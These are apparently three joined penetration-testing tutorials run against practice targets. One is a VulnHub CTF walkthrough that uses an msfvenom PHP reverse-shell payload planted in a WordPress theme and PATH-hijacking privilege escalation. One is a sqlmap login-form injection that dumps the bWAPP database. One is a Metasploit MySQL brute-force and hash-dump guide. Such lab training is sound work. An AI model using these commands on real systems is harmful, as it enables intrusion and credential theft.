Hack the USV VM (CTF Challenge)

A new challenge for all of you guys!

This CTF is all about conquering flags coming across our way as we go further in our penetration testing of this lab.  All the flags should be discovered in form of: Country name Flag:[md5 hash]. The network interface of this virtual machine will take it’s IP settings from DHCP.

Download lab from here : https://www.vulnhub.com/entry/usv-2016-v101,175/

Let’s get started with our first step.

netdiscover

From this we get our target IP.

Target IP: 192.168.0.103

Now we will scan it with nmap which will give us all the open ports in particular lab for further penetration testing.

nmap –p- -A 192.168.0.103

This result shows that following ports are open 22 , 80 , 3129 , 3306 , 21211 and http proxy is used on port 3129.

 So now lets proceed with further penetration testing. Firstly we’ll go with ssh on port 22.

ssh 192.168.0.103

Ssh revealed a ascii Dragon with some strings and a base64 code written at bottom. Looking closer you’ll see something written on top AES-ECB.

By Google search we found out that there is a website called aesencryption.net where we can decrypt the base64 code we got in our last result. So we will decrypt that code with the given key in image by all this process we arrived at our 1st flag i.e ITALY FLAG

Ok so now let’s head towards second flag and for that we are going to open target IP in browser as port 80 is also open. Look at that. We got access forbidden. No result.

As we opened target ip in browser simultaneously we have captured the cookies through burp suite after setting the manual proxy in browser. When all this is done, right click on its window where intercepted data is fetched and a kind of action list will put on view further click to send to repeater.

Look over screenshot below you will find two panel left and right for request and response respectively. In the response window the highlighted text is our flag.

As this code is in base64 so we are going to use HackBar plugin in Mozilla firefox which is preinstalled or can be easily installed. Whoa decoding the code in it we got another flag which is our second flag i.e. CROATIA FLAG

Moving ahead, from our nmap result we got that http-proxy is set on port 3129 so we will set proxy setting for our target IP with port number 3129 as shown below.

Now try opening target IP in browser and wait for few seconds like 10 sec. The proxy setting did the trick and website reveals a single page with a changing banner of “WINTER IS COMING” and “ALL MEN MUST DIE”. Some of you may be aware of this but for those who do not know about this. It is Games of Thrones.

The site didn’t show much so I used nikto scanner with proxy to get some information about it which will be helpful in further testing.

nikto –h 192.168.0.103 –useproxy  http://192.168.0.103:3129

It reveals a wordpress login at /blog.

Ok!  Now open it in browser. Great, Games of Thrones notion is confirmed as Seven Kingdoms blog is shown.

Scrolling down in this site you can see that there is an interesting second post which shows ‘I have a message for you’. There is a highlighted option so jst try to open it in browser.

Awesome!!!! This reveals a message and a download link for a zip file. Interesting, so go ahead and download it.

Unzipping the file shows an image of a man with a bottle of perfume and a base64 encoded string at bottom.

Here we decrypt the code in the hackbar plugin which results in another flag. From this step we got our third flag i.e. PORTUGAL FLAG

 Now , returning to previous site there are several post which are all useless so just scroll down to see if there is something useful or not  and then comes a last post which is of our interest.

‘Protected: the secret chapter ‘

Oh! We have to provide a password to get through it. This one took some time and to spare your time I won’t go through my failures,

I have created dictionary of possible passwords which are nothing but some of the words in this whole page with the help of following command.

cewl –d 2 –m 5 –proxy_host 192.168.0.103 –proxy_port 3129 –w /root/Desktop/dict.txt http://192.168.0.103/blog/

From the list we get that password is ‘westerosi’

Using this password we came to another page which revealed another flag in base64 encoded string and below it some kind of images of an actress.

Now again decrypt it in and as a result we have our fourth flag i.e. PARAGUAY FLAG

Moving to one level up, from site we got another message that “the mother_of_dragons has a password which is in right front of your eyes”.

Knowing nothing about the eyes of actress I restored to google to see if I get any clue from there but no such luck.

I looked at the message again and it states ‘password which is in front of your eyes’

That’s the password of mother_of_dragons is ‘in front of your eyes’. But wait a minute where is this password is used.

We have ftp service running. So let’s try and get through it

ftp 192.168.0.103 21211

ls –al

get .note.txt

exit

cat .note.txt

bingo! Here that password is used. At the bottom result shows that children’s name is used for password. Again a password but this time it is used for wordpress login which we are going to use in coming steps.

Again I googled and found out she doesn’t had any children rather had 3 dragons named Drogon , Rhaegal and Viserion. So I put all these names into a file along with all possible combinations.

List is small so by entering each one the desired password could be find out.

Password is RhaegalDrogonViserion

Apply the credentials for wordpress and we are in!

Looking around the site I found the profile section which reveals the base64 encoded string for mother_of_dragons.

Like always decode the base64 code in HackBar and here we have another flag.

This is our fifth flag i.e. THAILAND FLAG

Now with only 2 flags left its time for shell access as we have wordpress.

Moving further, firstly make a php code through msfvenom which can be used to get the meterpreter session.

Msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

Being admin of the site I am able to edit the theme. So I replaced the 404.php code of template in Viking theme with the above highlighted php code.

On the other side to get the meterpreter session open kali terminal and run multi handler. And for that type the following commands.

Use exploit/multi/handler

Set payload php/meterpreter/reverse_tcp

Set lhost=192.168.0.103

Set lport=4444

exploit

as we have meterpreter session ,now go to shell and type following commands

echo “ import pty; pty.spawn(‘ /bin/bash’)” > /tmp/asdf.py

python /tmp/asdf.py

cd /srv/http

ls

it shows a reward_flag.txt file so call it with cat command

cat reward_flag.txt

As a result we get a base64 encoded string.

Do not worry soon this decoding thing is going to over as we have sixth flag with this decoding. So as a result our sixth flag is MONGOLIA FLAG

Back to another file in above list of files i.e. winterfell_messenger .  We see its executable and owner is root. So run it with following command

./winterfell_messenger

Cat: /root/message.txt

It shows that it’s using cat command to read a file in the /root directory.

Using strings shows that cat command is being used; however it’s not using the full path to the program. From this we come to know that it will search for set PATH to run.

Now, we are able to update PATH by using export but first we need to find out the writable directory and for that we have used /tmp. In /tmp we will create an executable file named cat so it can be called by the winterfell_messenger program. This file will be running as root so we will use /bin/bash to call shell and to change the mode. Run the following commands.

echo “ /bin/bash” > /tmp/cat

chmod 777 /tmp/cat

echo $PATH

/usr/local/sbin: /usr/local/bin:/usr/sbin:/usr/bin

After this step we are going to update the PATH to remove the /tmp directory  we added. For this type the following commands.

Export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

Now, we will go to the home directory of http to get the desired file . For that type

cd  /srv/http

ls

now  call the winterfell_messenger file by using given command.

./winterfell_message

id

Now go to root and there we have .flag.txt file.

Now running cat against .flag.txt we get a congratulations, a wolf made up of ascii characters and a base64 encoded string at the bottom. Commands are given below.

 cd /root

/usr/sbin/cat .flag.txt

Finally decoding in hackbar reveals seventh and last flag which is nothing but the SOMALIA FLAG

Whoola. We reached at the end and with this job is done. Hope you enjoyed it and obviously penetration skills are refreshed.

Exploiting Form Based Sql Injection using Sqlmap

In this tutorial you will came to across how to perfrom sql injection attack on a login form of any website. There are so many example related to login form like: facebook login; gmail login; other online accounts which may ask you to submit your information as username and password and then give permission to login your account on that web server.  Here we are going to perform sql inection login form attack on a vulnerable web server application  and then fetch the information present inside their database.

Lets Begin!!!

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, sqlmap tool

Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.102:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (Login form/Hero) now and click on hack.

A login form get open where it is ask to submit the credential of superhero which we don’t know. So I am going to give any random login and password like iron:man, in order to capture the request through burp suite.

To capture the request of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to login. Use intercepts highlighted data within sqlmap commands.

Now open the terminal of your kali Linux and type following command for the enumeration of databases name.

sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST --dbs --batch

From enumeration result we get the information of the bend-end database management system is MYSQL 5.5 and web server operating system is windows with Apache 2.4.7 and PHP 5.5.9 and fetch all names of database. So if you notice image given below we have caught all name of databases. Choose any name for fetching more details.

Now type the below command which will try  to fetch entire data from inside database of bwapp

sqlmap -u http://192.168.1.102:81/bWAPP/sqli_3.php --data="login=iron&password=man&form=submit" --method POST -D bwapp --dump all --batch

First I found a table “BLOG” which contains four columns but this table appears to be empty as all fields are left blank.

Next I found table “MOVIES” in database bwapp and you can see from given screenshot it contains movies detail. There are 10 entries in each of following column

 Luckily!!! I have got data which contains id, login, password and secret entries inside the “HEROES” table and may be this dumped data can help me to bypass the login page of the above web page which we have open in the browser. I will use the login and password later to verify it.

Here I founds only three entries for table “USERS” inside the bwapp which also contains credential for admin account.

Another empty table “VISITORS” like “blog” table, it is also left blank.

Sqlmap has dumped too much of data from inside the database of bwapp, as you have seen I have got data from different table, now let’s verify this result.  Browse bwapp in local host again and once again open the login form page inside the bwapp.

If you remembered sqlmap has dumped table of “HEROES” which contains login and password now using above fetched data (Thor: Asgard) from inside the table of “heroes” I will use these credential for login.

Now type thor in the text field given for login and then type Asgard as password. Click on login.

Congrats!!! We got successful login and you can read the secret given for thor which exactly same as inside the “heroes” table.

Conclusion: Through this article we had learn how to perform an attack on a login form of a web site and retrieve its data from inside the database.

Beginner Guide of mysql Penetration Testing

In this article we are going to perform penetration testing on mysql server, here we will perform attack through metasploit framework.

Attacker: kali Linux

Target: metasploitable II

Lets Begin!!

192.168.1.103 is our target IP. Firstly type NMAP command to scan the target IP to make sure whether the mysql service is running on host IP or not. Here you can see port 3306 is open for mysql service.

nmap -sV 192.168.1.103

Now start the metasploit type type following command in kali terminal

Msfconsole

Enumerates the version of MySQL servers.

msf > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mysql_version) > set rhosts 192.168.1.103

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) >expoit

Here it had shown the version of MYSQL is 5.0.51a-3ubuntu5 and if you noticed the same result we have got from nmap version scan.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.103

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > exploit

Here we got successful result as root which does not required any password for login into mysql server.

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

msf > use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.103

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > exploit

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

msf > use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.103

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > exploit

Now from screenshot you can read the password given for users.

Now we have enumerated much information with the help of metasploit now let’s try to connect with MYSQL server in order to dump its data. Type following command on terminal

mysql -h 192.168.1.103 -u root –p

Hit enter for password; here we got access of MYSQL server now I am going to fetch its data.

mysql> show databases;

it has shown all databases name present inside it. Let’s check the tables inside the dvwa.

mysql> show tables from dvwa;

Let’s fetch the data inside dvwa database; now type following command.

mysql> use dvwa;

Now we can fetch the data present inside the database dvwa.

mysql> show tables;

mysql> select * from users;

Now you can see I have got all users name with their hash password.

Try it yourself for others database details.